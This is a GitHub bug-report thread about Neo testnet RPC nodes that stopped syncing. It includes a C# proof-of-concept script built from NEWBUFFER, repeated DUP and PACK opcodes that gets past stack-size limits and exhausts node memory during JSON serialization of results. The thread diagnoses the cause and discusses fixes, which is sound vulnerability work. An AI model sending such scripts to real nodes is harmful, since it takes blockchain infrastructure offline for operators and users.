all RPC nodes on testnet stopped syncing maybe caused by some modules #2666
Comments
```
curl http://seed5t4.neo.org:20332 -d '{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "getblockcount",
  "params": [
    "0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
  ]
}'
```
They are all now stuck at 1245636.

It should be a bug from

The script is:
Based on @dusmart's exploit, we can construct a new exploit that requires 1024 GB of memory: NEWBUFFER, DUP, DUP, ..., PACK (from here, every stack item is 1 GB), DUP, DUP, DUP, DUP, DUP.
This script consumes an incredible amount of memory; it OOMs on my 64 GB machine.
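For concreteness, here is a minimal sketch of how a script of that shape could be assembled with neo-vm's ScriptBuilder (the 1 MB buffer size and the repeat counts are illustrative assumptions, not the exact payload from this report):

```csharp
using Neo.VM;

// Sketch of the exploit shape described above: build one large buffer, duplicate the
// reference many times, pack the copies into an array, then duplicate the array itself
// so several copies of it end up on the result stack.
var sb = new ScriptBuilder();
sb.EmitPush(1024 * 1024);          // a 1 MB buffer
sb.Emit(OpCode.NEWBUFFER);
for (int i = 0; i < 1023; i++)
    sb.Emit(OpCode.DUP);           // 1024 references to the same buffer
sb.EmitPush(1024);
sb.Emit(OpCode.PACK);              // one array that "contains" ~1 GB of data
for (int i = 0; i < 5; i++)
    sb.Emit(OpCode.DUP);           // leave several copies of that array behind
byte[] script = sb.ToArray();
```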
I think the root cause is that we only consider CPU usage and ignore memory cost when setting OpCode prices.
There is a StackItem size limit: https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39
@ZhangTao1596 Nope, I checked the code, there is no size check under PACK. Just create 1024 1 MB buffers, then pack them together. Other opcodes that can similarly bypass the size limitation: PACKMAP
@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643? I'm not sure if packed items are still counted in the ReferenceCounter.
@ZhangTao1596 BTW, to answer your question, packed items are removed from the ReferenceCounter. For reference, the stack size limit is:

```csharp
/// <summary>
/// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
/// </summary>
public uint MaxStackSize { get; init; } = 2 * 1024;
```
By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But memory usage explodes at `json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems)));` if the script is invoked through RPC. In the ApplicationLogs plugin, `var txJson = TxLogToJson(appExec);` with `trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray();` can also lead to a memory blow-up.
We have to limit the items in the ResultStack in ApplicationLogs.
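A minimal sketch of that idea (not an actual patch: `maxItems` and the placeholder text are hypothetical, and the surrounding plugin code and usings are assumed to be as quoted above):

```csharp
// Sketch only: serialize at most maxItems entries from the stack, and fall back to a
// short placeholder when converting an item to JSON fails.
// maxItems would be a new, hypothetical ApplicationLogs setting.
trigger["stack"] = appExec.Stack
    .Take(maxItems)
    .Select(q =>
    {
        try { return q.ToJson(); }   // same conversion the plugin already uses
        catch (Exception) { return new JString("serialization truncated"); }
    })
    .ToArray();
```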
NeoGo has no problem with this:
So our nodes never stopped and worked just fine.
But this script breaks the node, so it should be investigated.
And it's all purely a JSONization issue; the script itself runs fine and does not consume a lot of memory, as @Hecate2 already noticed, but an attempt to make JSON out of the result does.
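To make the reference-versus-serialization gap concrete, here is a small standalone illustration (plain byte arrays stand in for real StackItems; the sizes mirror the exploit described above and the base64 factor is an approximation):

```csharp
using System;
using System.Linq;

// Toy model of the exploit's memory profile: the VM holds 1024 references to one shared
// 1 MB buffer (about 1 MB of real data), but JSONizing the packed array writes the
// buffer's contents out once per reference (byte strings are rendered as base64 text).
class JsonBlowupDemo
{
    static void Main()
    {
        byte[] sharedBuffer = new byte[1024 * 1024];                   // one 1 MB buffer
        byte[][] packed = Enumerable.Repeat(sharedBuffer, 1024).ToArray();

        long inMemory = sharedBuffer.Length;                           // data actually allocated
        long serialized = packed.Sum(b => (long)(b.Length * 4.0 / 3)); // base64 text per copy

        Console.WriteLine($"Data held by references: ~{inMemory / (1024 * 1024)} MB");
        Console.WriteLine($"Serialized JSON text:    ~{serialized / (1024 * 1024)} MB");
    }
}
```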
I think we'll just limit the JSON size. We have two ways to JSONize stack items; one is used for StdLib's
I don't think it differs a lot from the previous one; it'll all be fixed by nspcc-dev/neo-go#2386.
I think this one was solved quite a while ago and can be closed now. |
Describe the bug
Accidentally, we constructed a tx that leaves lots of large StackItems on the Result Stack. After sending that, all seed nodes stopped syncing.
To Reproduce
Expected behavior
All nodes keep syncing normally.
Screenshots
(Optional) Additional context
We suspect that this is caused by some neo modules.